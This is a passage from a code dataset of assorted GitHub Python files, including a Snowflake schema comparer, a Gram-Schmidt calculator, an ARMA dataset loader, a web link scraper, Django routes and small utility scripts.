single value representing the total\n        time difference between the user input time and the delivery start time\n\n    Raises:\n        N/A: This function raises no errors/has no error checking\n\n    Time complexity: Because return_time_info has no loops, its time complexity is O(1)\n    Space complexity: Because only a fixed-size tuple and a few variables are used, the space complexity is O(1)\n    \"\"\"\n    while True:\n        time = input(\n            \"Enter a time after 08:00:00 but before 17:00:00 (in military time, i.e., 0900) to check package status \"\n            \"or 'X' to exit: \")\n\n        if time.upper() == 'X':\n            break\n        elif len(time) != 4 or not time.isdigit() or int(time) < 800 or int(time) > 1700:\n            continue\n\n        dt_tuple = tuple([int(x) for x in STARTING_DATE_STR.split('-')]) + tuple([int(time[:2])]) + tuple(\n            [int(time[2:])])\n        dt_obj = datetime(*dt_tuple)\n        time_difference = dt_obj - STARTING_TIME\n\n        if dt_obj > STARTING_TIME:\n            return time_difference.total_seconds()\n","repo_name":"alexhenson/Automated-Package-Delivery","sub_path":"libraries/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28399200036","text":"import geopandas as gpd\nfrom shapely.geometry import Polygon\n\nimport src.utils.settings as settings\n\n\nclass GridGenerator:\n    def __init__(self,\n                 bounding_box,\n                 epsg_code):\n        \"\"\"\n        | Constructor method\n\n        :param (int, int, int, int) bounding_box: bounding box (x_1, y_1, x_2, y_2)\n        :param int epsg_code: epsg code of the coordinate reference system\n        :returns: None\n        :rtype: None\n        \"\"\"\n        self.bounding_box = bounding_box\n        self.epsg_code = epsg_code\n\n    def get_coordinates(self, tile_size_meters):\n        \"\"\"\n        | Returns the coordinates of the top left corner of each tile in the area of the bounding box.\n          The bounding box is quantized to the image size in meters.\n\n        :param int tile_size_meters: tile size in meters\n        :returns: coordinates (x, y) of each tile\n        :rtype: list[(int, int)]\n        \"\"\"\n        coordinates = []\n\n        bounding_box = (self.bounding_box[0] - (self.bounding_box[0] % settings.IMAGE_SIZE_METERS),\n                        self.bounding_box[1] - (self.bounding_box[1] % settings.IMAGE_SIZE_METERS),\n                        self.bounding_box[2],\n                        self.bounding_box[3])\n\n        columns = (bounding_box[2] - bounding_box[0]) // tile_size_meters\n        if (bounding_box[2] - bounding_box[0]) % tile_size_meters:\n            columns += 1\n\n        rows = (bounding_box[3] - bounding_box[1]) // tile_size_meters\n        if (bounding_box[3] - bounding_box[1]) % tile_size_meters:\n            rows += 1\n\n        for row in range(rows):\n            for column in range(columns):\n                coordinates.append((bounding_box[0] + column * tile_size_meters,\n                                    bounding_box[1] + (row + 1) * tile_size_meters))\n\n        return coordinates\n\n    @staticmethod\n    def get_bounding_box(coordinates, tile_size_meters):\n        \"\"\"\n        | Returns the bounding box of a tile given its coordinates of the top left corner.\n\n        :param (int, int) coordinates: coordinates (x, y)\n        :param int tile_size_meters: tile size in meters\n        :returns: bounding box (x_1, y_1, x_2, y_2)\n        :rtype: (int, int, int, int)\n        \"\"\"\n        bounding_box = (coordinates[0],\n                        coordinates[1] - tile_size_meters,\n                        coordinates[0] + tile_size_meters,\n                        coordinates[1])\n        return bounding_box\n\n    @staticmethod\n    def get_polygon(coordinates, tile_size_meters):\n        \"\"\"\n        | Returns the polygon of a tile given its coordinates of the top left corner.\n\n        :param (int, int) coordinates: coordinates (x, y)\n        :param int tile_size_meters: tile size in meters\n        :returns: 
polygon\n        :rtype: Polygon\n        \"\"\"\n        bounding_box = GridGenerator.get_bounding_box(coordinates=coordinates,\n                                                      tile_size_meters=tile_size_meters)\n        polygon = Polygon([[bounding_box[0], bounding_box[1]],\n                           [bounding_box[2], bounding_box[1]],\n                           [bounding_box[2], bounding_box[3]],\n                           [bounding_box[0], bounding_box[3]]])\n        return polygon\n\n    def get_grid(self, tile_size_meters):\n        \"\"\"\n        | Returns a geodataframe of the grid.\n\n        :param int tile_size_meters: tile size in meters\n        :returns: geodataframe\n        :rtype: gpd.GeoDataFrame\n        \"\"\"\n        coordinates = self.get_coordinates(tile_size_meters=tile_size_meters)\n\n        polygons = []\n\n        for coordinates_element in coordinates:\n            polygon = self.get_polygon(coordinates=coordinates_element,\n                                       tile_size_meters=tile_size_meters)\n            polygons.append(polygon)\n\n        gdf = gpd.GeoDataFrame(geometry=polygons, crs=f'EPSG:{self.epsg_code}')\n        return gdf\n","repo_name":"mrsmrynk/adois","sub_path":"src/utils/grid_generator.py","file_name":"grid_generator.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"18173926380","text":"import os\nimport json\nfrom os.path import expanduser\nimport yaml\nimport snowflake.connector as sfconn\nfrom yaml.loader import FullLoader\n\nfrom snowbim.utilities import common\n\n\ndef connect(profile_dir:str=None, profile:str=None, target:str=None, db:str=None, schema:str=None):\n    '''\n    Use dbt profiles.yml to connect to the Snowflake database\n    Returns a tuple (code, Snowflake connection, message)\n    '''\n    conn = {}\n\n    profile_path = ''\n    if not profile_dir:\n        profile_path = f'{expanduser(\"~\")}/.dbt/profiles.yml'\n    else:\n        profile_path = f'{profile_dir}/profiles.yml'\n    print(f'dbt profile was found at: {profile_path}')\n\n    with open(profile_path, 'r') as stream:\n        try:\n            cred = yaml.load(stream, Loader=FullLoader)\n        except yaml.YAMLError as e:\n            return (-1, {}, str(e))\n\n    if profile is None:\n        cred = cred[next(iter(cred))]\n    else:\n        cred = cred[profile]\n\n    cred = cred['outputs']\n    if target is None:\n        cred = cred[next(iter(cred))]\n    else:\n        cred = cred[target]\n\n    if cred is None or cred['type'] != 'snowflake':\n        return (-1, {}, f'Snowflake config not found: project={str(profile)}, target={str(target)} within profile: {profile_path}')\n\n    # cred = {'type': 'snowflake', 'account': 'xxx', 'user': 'xxx', 'password': 'xxx', 'role': 'xxx', 'database': 'xxx', 'warehouse': 'xxx', 'schema': 'xxx'}\n    conn = sfconn.connect(\n        user = cred['user'],\n        password = cred['password'],\n        account = cred['account'],\n        warehouse = cred['warehouse'] or 'COMPUTE_WH',\n        database = db or cred['database'] or 'DEMO_DB',\n        schema = schema or cred['schema'] or 'PUBLIC',\n        role = cred['role'] or 'PUBLIC'\n    )\n    \n    return (0, conn, None)\n\n\ndef compare_schema(snowflake_conn, bim_path:str=None, mode:str='directQuery', tables:list=[], exclude_tables:list=[], replace_partition:bool=False):\n    '''\n    Get the changes of the Snowflake database schema\n    Currently supports only\n    changes = { \"model\": { \"tables\": [ { \"columns\": [...] 
}, {...} ] } }\n Returns a tuple (code, changes, message)\n '''\n # Input bim data\n in_schema = {}\n if bim_path and os.path.exists(bim_path):\n with open(bim_path, 'r') as f:\n in_schema = json.load(f)\n in_schema = in_schema['model']['tables']\n\n # SF bim data\n snowflake_schema = []\n cur = snowflake_conn.cursor()\n\n filterred_tables_string = \"1 = 1\"\n filterred_exctables_string = \"1 = 1\"\n if tables and len(tables) > 0:\n filterred_tables_string = ','.join(tables)\n filterred_tables_string = filterred_tables_string.replace(',',\"','\")\n filterred_tables_string = f\"\\\"TABLE_NAME\\\" IN ('{filterred_tables_string}')\"\n if exclude_tables and len(exclude_tables) > 0:\n filterred_exctables_string = ','.join(exclude_tables)\n filterred_exctables_string = filterred_exctables_string.replace(',',\"','\")\n filterred_exctables_string = f\"\\\"TABLE_NAME\\\" NOT IN ('{filterred_exctables_string}')\"\n\n cur.execute(f'''\n SELECT \"TABLE_NAME\",\n \"TABLE_TYPE\"\n FROM \"INFORMATION_SCHEMA\".\"TABLES\"\n WHERE \"TABLE_SCHEMA\" = \\'{snowflake_conn.schema}\\'\n AND {filterred_tables_string}\n AND {filterred_exctables_string}\n ORDER BY \"TABLE_SCHEMA\", \"TABLE_NAME\"\n ''')\n df_tables = cur.fetch_pandas_all()\n\n cur.execute(f'''\n SELECT \"TABLE_SCHEMA\",\n \"TABLE_NAME\",\n \"COLUMN_NAME\",\n \"DATA_TYPE\"\n FROM \"INFORMATION_SCHEMA\".\"COLUMNS\" \n WHERE \"TABLE_SCHEMA\" = \\'{snowflake_conn.schema}\\' \n AND {filterred_tables_string}\n AND {filterred_exctables_string}\n ORDER BY \"TABLE_SCHEMA\", \"TABLE_NAME\", \"COLUMN_NAME\"\n ''')\n df_columns = cur.fetch_pandas_all()\n \n for index, item in df_tables.iterrows():\n table_item = {\n \"name\": item['TABLE_NAME'],\n \"is_new\": 1,\n \"columns\": [],\n \"partitions\": [\n {\n \"name\": f\"{item['TABLE_NAME']} Partition\",\n \"is_new\": 1,\n \"mode\": mode,\n \"source\": {\n \"type\": \"m\",\n \"expression\": [\n f\"let\",\n f\" Source = Snowflake.Databases(\\\"{snowflake_conn.account}.snowflakecomputing.com\\\", \\\"{snowflake_conn.warehouse}\\\", [Role=\\\"{snowflake_conn.role}\\\", CreateNavigationProperties=null, ConnectionTimeout=null, CommandTimeout=null]),\",\n f\" {snowflake_conn.database}_Database = Source{{[Name=\\\"{snowflake_conn.database}\\\",Kind=\\\"Database\\\"]}}[Data],\",\n f\" {snowflake_conn.schema}_Schema = {snowflake_conn.database}_Database{{[Name=\\\"{snowflake_conn.schema}\\\",Kind=\\\"Schema\\\"]}}[Data],\",\n f\" #\\\"{item['TABLE_NAME']}_{item['TABLE_TYPE'].title()}\\\" = {snowflake_conn.schema}_Schema{{[Name=\\\"{item['TABLE_NAME']}\\\",Kind=\\\"{item['TABLE_TYPE'].title()}\\\"]}}[Data]\",\n f\"in\",\n f\" #\\\"{item['TABLE_NAME']}_{item['TABLE_TYPE'].title()}\\\"\"\n ]\n }\n }\n ]\n }\n\n df_filterred_columns = df_columns.loc[df_columns['TABLE_NAME'] == item['TABLE_NAME']]\n for index, citem in df_filterred_columns.iterrows():\n table_item['columns'].append({\n \"name\": citem['COLUMN_NAME'],\n \"is_new\": 1,\n \"dataType\": citem['DATA_TYPE'],\n \"sourceColumn\": citem['COLUMN_NAME']\n })\n snowflake_schema.append(table_item)\n \n # Detect changes\n changes = { \"model\": { \"tables\": [ ] } }\n for sftable in snowflake_schema:\n in_table = [x for x in in_schema if x['name'] == sftable['name']]\n if in_table:\n # existing table\n in_table = in_table[0]\n\n table = {}\n table['name'] = in_table['name']\n table['is_new'] = 0\n\n # columns\n table['columns'] = []\n for sfcolumn in sftable['columns']:\n in_column = [x for x in in_table['columns'] if x['name'] == sfcolumn['name']]\n if in_column:\n # 
existing column\n in_column = in_column[0]\n sf_model_type = common.get_model_datatype(sfcolumn['dataType'])\n if (in_column['dataType'] != sf_model_type or in_column['sourceColumn'] != sfcolumn['sourceColumn']):\n in_column['dataType'] = sf_model_type\n in_column['sourceColumn'] = sfcolumn['sourceColumn']\n in_column['is_new'] = 0\n\n table['columns'].append(in_column)\n else:\n # new column\n sfcolumn['dataType'] = common.get_model_datatype(sfcolumn['dataType'])\n table['columns'].append(sfcolumn)\n\n # partitions\n table['partitions'] = []\n if replace_partition:\n table['partitions'] = sftable['partitions']\n else:\n for sfpartition in sftable['partitions']:\n in_partition = [\n x for x in in_table['partitions']\n if len(set(x['source']['expression']).intersection(sfpartition['source']['expression'])) == len(x['source']['expression'])\n and x['source']['type'] == sfpartition['source']['type']\n and x['mode'] == sfpartition['mode']\n ]\n if in_partition:\n # existing partition\n pass\n else:\n # new partition\n table['partitions'].append(sfpartition)\n\n if len(table['columns']) > 0 or len(table['partitions']) > 0:\n changes['model']['tables'].append(table)\n else:\n # new table\n for sfcolumn in sftable['columns']:\n sfcolumn['dataType'] = common.get_model_datatype(sfcolumn['dataType'])\n changes['model']['tables'].append(sftable)\n \n return (0, changes, None)","repo_name":"datnguye/snowbim","sub_path":"snowbim/engines/snowengine.py","file_name":"snowengine.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28470277839","text":"import numpy as np\r\nclass GSOExp:\r\n exp1=\"\"\r\n exp2=\"\"\r\n exp3=\"\"\r\n exp4=\"\"\r\n exp5=\"\"\r\n e1 = \"\"\r\n e2 = \"\"\r\n e3 = \"\"\r\n e4 = \"\"\r\n e5 = \"\"\r\n\r\n def __init__(self, Vec, Dim, Vec1, Vec2, Vec3, Vec4, Vec5):\r\n self.Vsize = Vec\r\n self.DIM = Dim\r\n self.V1 = Vec1\r\n self.V2 = Vec2\r\n self.V3 = Vec3\r\n self.V4 = Vec4\r\n self.V5 = Vec5\r\n np.set_printoptions(precision=3)\r\n\r\n def __del__(self):\r\n class_name=self.__class__.__name__\r\n\r\n def MatBrkt(self, arr):\r\n return str(np.round(arr,3)).replace('[[', '[').replace(']]', ']')\r\n \r\n\r\n def GSOcalc(self):\r\n u1 = np.array(self.V1).reshape(1, self.DIM)\r\n GSOExp.e1 = u1 / np.linalg.norm(u1)\r\n GSOExp.exp1 = \"V1 = \"+self.MatBrkt(u1)+\"\\tu1 = \"+self.MatBrkt(u1)\r\n exp = GSOExp.exp1\r\n if self.Vsize>=2:\r\n V2 = np.array(self.V2).reshape(1, self.DIM)\r\n V2e1 = np.sum(V2*GSOExp.e1)\r\n u2 = V2 - V2e1*GSOExp.e1\r\n GSOExp.e2 = u2 / np.linalg.norm(u2)\r\n GSOExp.exp2 = \"V2 = \"+self.MatBrkt(V2)+\"\\t<V2,e1> = \"+str(round(V2e1,3))+\"\\nu2 = V2 - <V2,e1>e1 \\nu2 = \"+self.MatBrkt(u2)\r\n exp = GSOExp.exp2\r\n if self.Vsize>=3:\r\n V3 = np.array(self.V3).reshape(1, self.DIM)\r\n V3e1 = np.sum(V3*GSOExp.e1)\r\n V3e2 = np.sum(V3*GSOExp.e2)\r\n u3 = V3 - V3e2*GSOExp.e2 - V3e1*GSOExp.e1\r\n GSOExp.e3 = u3 / np.linalg.norm(u3)\r\n GSOExp.exp3 = \"V3 = \"+self.MatBrkt(V3)+\"\\n<V3,e2> = \"+str(round(V3e2,3))+\"\\t\\t<V3,e1> = \"+str(round(V3e1,3))+\"\\nu3 = V3 - <V3,e2>e2 - <V3,e1>e1\\nu3 = \" +self.MatBrkt(u3)\r\n exp = GSOExp.exp3\r\n if self.Vsize>=4:\r\n V4 = np.array(self.V4).reshape(1, self.DIM)\r\n V4e1 = np.sum(V4*GSOExp.e1)\r\n V4e2 = np.sum(V4*GSOExp.e2)\r\n V4e3 = np.sum(V4*GSOExp.e3)\r\n u4 = V4 - V4e3*GSOExp.e3 - V4e2*GSOExp.e2 - V4e1*GSOExp.e1\r\n GSOExp.e4 = u4 / np.linalg.norm(u4)\r\n GSOExp.exp4 = \"V4 = \"+self.MatBrkt(V4)+\"\\t<V4,e3> = 
\"+str(round(V4e3,3))+\"\\n<V4,e2> = \"+str(round(V4e2,3))+\"\\t\\t<V4e1> = \"+str(round(V4e1,3))+\"\\nu4 = V4 - <V4,e3>e3 - <V4,e2>e2 - <V4,e1>e1\\nu4 = \"+self.MatBrkt(u4)\r\n exp = GSOExp.exp4\r\n if self.Vsize == 5:\r\n V5 = np.array(self.V5).reshape(1, self.DIM)\r\n V5e1 = np.sum(V5*GSOExp.e1)\r\n V5e2 = np.sum(V5*GSOExp.e2)\r\n V5e3 = np.sum(V5*GSOExp.e3)\r\n V5e4 = np.sum(V5*GSOExp.e4)\r\n u5 = V5 - V5e4*GSOExp.e4 - V5e3*GSOExp.e3 - V5e2*GSOExp.e2 - V5e1*GSOExp.e1\r\n GSOExp.e5 = u5 / np.linalg.norm(u5)\r\n GSOExp.exp5 = \"V5 = \"+self.MatBrkt(V5)+\"\\n<V5,e4> = \"+str(round(V5e4,3))+\"\\t\\t<V5e3> = \"+str(round(V5e3,3))+\"\\n<V5e2> = \"+str(round(V5e2,3))+\"\\t\\t<V5e1> = \"+str(round(V5e1,3))+\"\\nu5 = V5 - <V5,e4>e4 - <V5,e3>e3 - \\n <V5,e2>e2 - <V5,e1>e1\\nu5 = \"+self.MatBrkt(u5)\r\n exp = GSOExp.exp5\r\n \r\n def U1(self):\r\n self.GSOcalc()\r\n return GSOExp.exp1\r\n def U2(self):\r\n self.GSOcalc()\r\n return GSOExp.exp2\r\n def U3(self):\r\n self.GSOcalc()\r\n return GSOExp.exp3\r\n def U4(self):\r\n self.GSOcalc()\r\n return GSOExp.exp4\r\n def U5(self):\r\n self.GSOcalc()\r\n return GSOExp.exp5\r\n \r\n def E1(self):\r\n self.GSOcalc()\r\n return \"e1 = \"+self.MatBrkt(GSOExp.e1)\r\n def E2(self):\r\n self.GSOcalc()\r\n return \"e2 = \"+self.MatBrkt(GSOExp.e2)\r\n def E3(self):\r\n self.GSOcalc()\r\n return \"e3 = \"+self.MatBrkt(GSOExp.e3)\r\n def E4(self):\r\n self.GSOcalc()\r\n return \"e4 = \"+self.MatBrkt(GSOExp.e4)\r\n def E5(self):\r\n self.GSOcalc()\r\n return \"e5 = \"+self.MatBrkt(GSOExp.e5)\r\n \r\n ","repo_name":"JunHong-1998/Tkinter-MCG-Calculator","sub_path":"GSOExp.py","file_name":"GSOExp.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33554662980","text":"def validCard(cardNumber):\n count = 0\n digitCount = 0\n prev = '#'\n repeat = 0\n \n if cardNumber[0] not in ['4','5','6']:\n return \"Invalid\"\n \n for i in range(len(cardNumber)):\n if cardNumber[i] == '-':\n if count % 4 != 0 or cardNumber[i-1] == '-':\n return \"Invalid\"\n count = 0\n \n elif cardNumber[i].isnumeric():\n digitCount+=1\n count+=1\n \n if prev == cardNumber[i]:\n if repeat == 3:\n return \"Invalid\"\n repeat+=1\n else:\n prev = cardNumber[i]\n repeat = 1\n \n else:\n return \"Invalid\"\n \n if digitCount > 16:\n return \"Invalid\"\n\n if digitCount == 16:\n return \"Valid\"\n return \"Invalid\"\n\nif __name__ == '__main__':\n \n for _ in range(int(input())):\n cardNumber = input()\n \n print (validCard(cardNumber))","repo_name":"ashishgopalhattimare/Python3-Course","sub_path":"Competitve Codes/validCardNumber.py","file_name":"validCardNumber.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42168529871","text":"import numpy as np\nimport os\nimport pickle as pkl\nimport torch as th\n\nfrom .dataset import DataModule\n\ntry:\n from statsmodels.tsa.arima_process import ArmaProcess\nexcept ImportError:\n ArmaProcess = None\n\n\nfile_dir = os.path.dirname(__file__)\n\n\nclass Arma(DataModule):\n \"\"\"\n Arma dataset.\n\n Args:\n times (int): Length of each time series. Default to 50\n features (int): Number of features in each time series. Default to 50\n ar (list): Coefficient for autoregressive lag polynomial, including\n zero lag. If ``None``, use default values. Default to ``None``\n ma (list): Coefficient for moving-average lag polynomial, including\n zero lag. 
If ``None``, use default values. Default to ``None``\n data_dir (str): Where to download files.\n batch_size (int): Batch size. Default to 32\n n_folds (int): Number of folds for cross validation. If ``None``,\n the dataset is only split once between train and val using\n ``prop_val``. Default to ``None``\n fold (int): Index of the fold to use with cross-validation.\n Ignored if n_folds is None. Default to ``None``\n prop_val (float): Proportion of validation. Default to .2\n num_workers (int): Number of workers for the loaders. Default to 0\n seed (int): For the random split. Default to 42\n\n References:\n #. `Explaining Time Series Predictions with Dynamic Masks <https://arxiv.org/abs/2106.05303>`_\n #. https://www.statsmodels.org/dev/generated/statsmodels.tsa.arima_process.ArmaProcess.html\n\n Examples:\n >>> from tint.datasets import Arma\n <BLANKLINE>\n >>> arma = Arma()\n >>> arma.download(split=\"train\")\n >>> x_train = arma.preprocess(split=\"train\")[\"x\"]\n >>> y_train = arma.preprocess(split=\"train\")[\"y\"]\n \"\"\"\n\n def __init__(\n self,\n times: int = 50,\n features: int = 50,\n subset: int = 5,\n ar: list = None,\n ma: list = None,\n data_dir: str = os.path.join(\n os.path.split(file_dir)[0],\n \"data\",\n \"arma\",\n ),\n batch_size: int = 32,\n prop_val: float = 0.2,\n n_folds: int = None,\n fold: int = None,\n num_workers: int = 0,\n seed: int = 42,\n ):\n super().__init__(\n data_dir=data_dir,\n batch_size=batch_size,\n prop_val=prop_val,\n n_folds=n_folds,\n fold=fold,\n num_workers=num_workers,\n seed=seed,\n )\n\n self.times = times\n self.features = features\n self.subset = subset\n self.ar = ar or np.array([2, 0.5, 0.2, 0.1])\n self.ma = ma or np.array([2])\n\n @staticmethod\n def collate_fn(batch: list) -> (th.Tensor, th.Tensor):\n return th.stack([b[\"x\"] for b in batch]), None\n\n def download(\n self,\n train_size: int = 1000,\n test_size: int = 100,\n split: str = \"train\",\n ):\n assert (\n ArmaProcess is not None\n ), \"You must install statsmodels to generate arma data.\"\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n if split == \"train\":\n exp = train_size\n elif split == \"test\":\n exp = test_size\n else:\n raise NotImplementedError\n\n # Generate data\n data_arma = ArmaProcess(ar=self.ar, ma=self.ma).generate_sample(\n nsample=(exp, self.times, self.features),\n axis=1,\n )\n\n with open(file, \"wb\") as fp:\n pkl.dump(obj=data_arma, file=fp)\n\n def preprocess(self, split: str = \"train\") -> dict:\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n # Load data\n with open(file, \"rb\") as fp:\n features = pkl.load(file=fp)\n\n # There is no labels here\n return {\"x\": th.Tensor(features)}\n\n def true_saliency(self, split: str = \"train\", dim: int = 1) -> th.Tensor:\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n # Load data\n with open(file, \"rb\") as fp:\n features = th.from_numpy(pkl.load(file=fp)).float()\n\n outputs = th.zeros_like(features)\n\n if dim == 1:\n # Create a fixed permutation for each experiment\n for i in range(len(features)):\n perm = th.randperm(\n self.features,\n generator=th.Generator().manual_seed(self.seed),\n )\n outputs[\n i,\n int(self.times / 4) : int(3 * self.times / 4),\n perm[: self.subset],\n ] = 1\n\n elif dim == 2:\n for i in range(len(features)):\n t_rand = th.randint(\n low=0,\n high=self.times - self.subset,\n size=(1,),\n generator=th.Generator().manual_seed(self.seed),\n )\n outputs[\n i,\n t_rand : t_rand + self.subset,\n int(self.features / 4) : int(3 * self.features 
/ 4),\n                ] = 1\n\n        else:\n            raise NotImplementedError(\"dim must be 1 or 2\")\n\n        return outputs\n\n    @staticmethod\n    def get_white_box(\n        inputs: th.Tensor,\n        true_saliency: th.Tensor,\n    ) -> th.Tensor:\n        \"\"\"\n        Create a white box regressor to be interpreted.\n\n        Args:\n            inputs (th.Tensor): The input data.\n            true_saliency (th.Tensor): The true saliency.\n\n        Returns:\n            th.Tensor: Output data.\n        \"\"\"\n        outputs = th.zeros(inputs.shape).to(inputs.device)\n\n        # Populate the features\n        outputs[true_saliency.bool()] = inputs[true_saliency.bool()]\n\n        outputs = (outputs**2).sum(dim=-1)\n        return outputs\n","repo_name":"josephenguehard/time_interpret","sub_path":"tint/datasets/arma.py","file_name":"arma.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"1015376564","text":"try:\n    from nut2 import PyNUTClient\nexcept Exception as E:\n    print(__file__, E, 'pip install nut2')\n\n\nfrom Inc.Log import Log\nfrom ._Common import TProvider\n\n\nclass TProviderUpsNut(TProvider):\n    def __init__(self, aName):\n        self.Name = aName.encode(\"utf8\")\n\n    def Read(self, aNotUsed = None):\n        Client = PyNUTClient()\n        #Client.help()\n        #Client.list_ups()\n        Data = Client.list_vars(self.Name)\n\n        Result = {}\n        Result['Voltage'] = float(Data['input.voltage'])\n        Result['Status'] = Data['ups.status']\n        Result['default'] = Result['Voltage']\n        return Result\n\n    def Get(self, aKey = 'default'):\n        return self.GetKey(aKey)\n","repo_name":"VladVons/py-relay","sub_path":"src/Plugin/Providers/UpsNut.py","file_name":"UpsNut.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25674827215","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 22 06:36:33 2017\n\n@author: 代码医生 (Code Doctor), QQ group: 40016981, WeChat official account: xiangyuejiqiren\n@blog:http://blog.csdn.net/lijin6249\n\"\"\"\nimport tensorflow as tf\n\nglobal_step = tf.Variable(0, trainable=False)\n\ninitial_learning_rate = 0.1  # initial learning rate\n\nlearning_rate = tf.train.exponential_decay(initial_learning_rate,\n                                           global_step,\n                                           decay_steps=10,decay_rate=0.9)\nopt = tf.train.GradientDescentOptimizer(learning_rate)\n\nadd_global = global_step.assign_add(1)\nwith tf.Session() as sess:\n    tf.global_variables_initializer().run()\n    print(sess.run(learning_rate))\n    for i in range(20):\n        g, rate = sess.run([add_global, learning_rate])\n        print(g, rate)\n","repo_name":"Lebhoryi/learning_tf","sub_path":"6-3 退化学习率.py","file_name":"6-3 退化学习率.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"71270245585","text":"from unicodedata import name\nfrom numpy import full, full_like\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n#Parameter Setting\nurl = 'https://hdcservice.moph.go.th/hdc/main/index.php'\nreqs = requests.get(url)\nsoup = BeautifulSoup(reqs.text, 'html.parser')\nnames = soup.find_all('a') # find all names\nnames_cut = []\nurls = []\n\n#Find all texts and links and append them to the names_cut and urls lists\nfor link in soup.find_all('a'):\n    cut = link.text\n    names_cut.append(cut)\n\n    full_url = str(link.get('href'))\n    if str(full_url)[:2] == '..': #check if the link starts with '..'; 
if so, replace it with the base URL and merge the path\n        full_url = 'https://hdcservice.moph.go.th/hdc/' + full_url[3:]\n    if str(full_url)[:4] == '/hdc':\n        full_url = 'https://hdcservice.moph.go.th/hdc/' + full_url[5:]\n    urls.append(full_url)\n\ndf_names = pd.DataFrame(names_cut, columns=['name']) #Create dataframe for names\ndf_urls = pd.DataFrame(urls, columns=['url']) #Create dataframe for urls\ndf = pd.concat([df_names, df_urls], axis=1) #Concat dataframes\n\nprint(df.head(10))\n\ndf.to_csv('link_csv/All_link.csv', sep='|', index=False, encoding='utf-8-sig') #Save dataframe to csv file","repo_name":"cusniwtt/HDC-bot-scrapping","sub_path":"pull_link.py","file_name":"pull_link.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32093976981","text":"from django.urls import path\nfrom . import views\n\napp_name = 'cards'\n\nurlpatterns = [\n    path('', views.CardsListView.as_view(), name='card-list-all'),\n    path('sets/', views.CardSetList.as_view(), name='cardsets'),\n    path('sets/new/', views.CardSetCreate.as_view(), name='cardsets-new'),\n    path('sets/<slug:slug>/update/', views.CardSetUpdate.as_view(), name='cardsets-upd'),\n    path('cards/search', views.card_search, name='card-search'),\n    path('cards/<slug>/player/', views.cards_list_player, name='card-list-player'),\n    path('cards/<slug>/set/', views.card_list, name='card-list'),\n    path('cards/new/', views.CardCreate.as_view(), name='card-new-all'),\n    path('cards/<slug>/new/', views.CardNewSet.as_view(), name='card-new-set'),\n    path('cards/<int:pk>/', views.CardsDetail.as_view(), name='card-det'),\n    path('cards/<int:pk>/update/', views.CardUpdate.as_view(), name='card-upd'),\n]","repo_name":"guitardave/bbcards","sub_path":"cards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30939724742","text":"from apyori import apriori\nfrom task6 import *\n\ndef convert_apriori_results_to_pandas_df(results):\n\trules = []\n\t\n\tfor rule_set in results:\n\t\tfor rule in rule_set.ordered_statistics:\n\t\t\t# items_base = left side of rules, items_add = right side\n\t\t\t# support, confidence and lift for respective rules\n\t\t\trules.append([','.join(rule.items_base), ','.join(rule.items_add), rule_set.support, rule.confidence, rule.lift])\n\t\n\t# Cast to Pandas dataframe\n\treturn pd.DataFrame(rules, columns=['Left_side', 'Right_side', 'Support', 'Confidence', 'Lift'])\n\n# Sort list by type. 
Print sorted values by count.\ndef printOrderBys(type, count, order=False):\n\tglobal result_df\n\tresults = result_df.sort_values(by=type, ascending=order)\n\tprint(type + \" values\")\n\tprint(results.head(count))\n\n# Display entire columns\npd.set_option('display.max_colwidth', -1)\n\ndf = getDF() # From task6.py\nresult_df = None\n\n# names=['Host', 'Datetime', 'Request', 'Step', 'Session', 'User']\ntransactions = df.groupby(['Session'])['Request'].apply(list)\n\n# Cast to Python list\ntransaction_list = list(transactions)\nresults = list(apriori(transaction_list, min_support=0.02))\n\nresult_df = convert_apriori_results_to_pandas_df(results)\n\n# Order by lift\nprintOrderBys('Lift', 100)\n\n# Order by confidence\nprintOrderBys('Confidence', 100)","repo_name":"dlime12/Data-Analysis-Python","sub_path":"case_study2/web_2.py","file_name":"web_2.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10927063546","text":"import pygame\r\nimport numpy as np\r\nfrom random import randrange\r\n\r\npygame.init()\r\npygame.mixer.init()\r\nclass Py3d_data:\r\n    def __init__(self):\r\n        self.running = True\r\n        self.w = 640\r\n        self.h = 480\r\n        pygame.mixer.init()\r\n\r\n        self.screen_size = np.array([640,480])\r\n        self.perspective = 300\r\n        self.color_screen = (255,255,255)\r\n        self.screen=pygame.display.set_mode((self.w,self.h))\r\n        self.bgColor = np.array([0,0,0],float)\r\n\r\n        self.songPath = \"osuMap/\"\r\n        self.songdif = \"extra.osu\"\r\n        self.beatmap = None\r\n        \r\n        self.game_mover_spd = 10\r\n        self.game_length = 100\r\n        self.game_sync = 0.4\r\n        self.game_volumeAudio = 0.4\r\n        self.game_volumeHit = 1.0\r\n        self.fps = 1\r\n        \r\n        #old var\r\n        